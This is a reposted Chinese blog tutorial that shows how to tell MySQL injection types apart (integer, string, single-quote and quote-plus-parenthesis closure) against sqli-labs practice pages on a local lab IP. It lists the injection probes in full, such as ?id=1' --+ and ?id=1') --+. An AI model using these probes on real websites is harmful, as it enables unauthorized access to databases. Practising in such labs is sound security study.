飞道的博客

Mysql注入 -- 注入类型

244人阅读  评论(0)

​钱真的很重要,以前总觉得太看重钱的人现实,但没钱,真的寸步难行。。。

----  网易云热评

 

一、整数注入

1、访问http://192.168.139.129/sqli/Less-2/?id=1 and 1=1,返回正常

2、访问http://192.168.139.129/sqli/Less-2/?id=2-1,返回正常

3、访问http://192.168.139.129/sqli/Less-2/?id=1 and 1=2,返回不正常

说明该注入点是整数注入

二、字符串注入

1、访问http://192.168.139.129/sqli/Less-1/?id=1 and 1=1,返回正常

2、访问http://192.168.139.129/sqli/Less-1/?id=1 and 1=2,返回正常

说明该注入点是字符串注入

三、单引号闭合

1、输入单引号,返回错误,错误信息为('1'' LIMIT 0,1),1后面多了一个单引号,我们用(--+)屏蔽后面的单引号

http://192.168.139.129/sqli/Less-1/?id=1'

2、访问http://192.168.139.129/sqli/Less-1/?id=1' --+,返回正常

四、单引号+括号闭合

1、输入单引号,返回错误,错误信息为('1'') LIMIT 0,1),1后面多了一个单引号和一般括号,我们用('))把前面的括号闭合,然后再用(--+)屏蔽后面的单引号和括号

http://192.168.139.129/sqli/Less-3/?id=1'

2、访问http://192.168.139.129/sqli/Less-3/?id=1') --+,返回正常

五、其他字符串闭合

1、双引号

2、加多重括号等等。。。

 

 

禁止非法,后果自负

欢迎关注公众号:web安全工具库

欢迎关注视频号:之乎者也吧


转载:https://blog.csdn.net/weixin_41489908/article/details/116596703
查看评论
* 以上用户言论只代表其个人观点,不代表本网站的观点或立场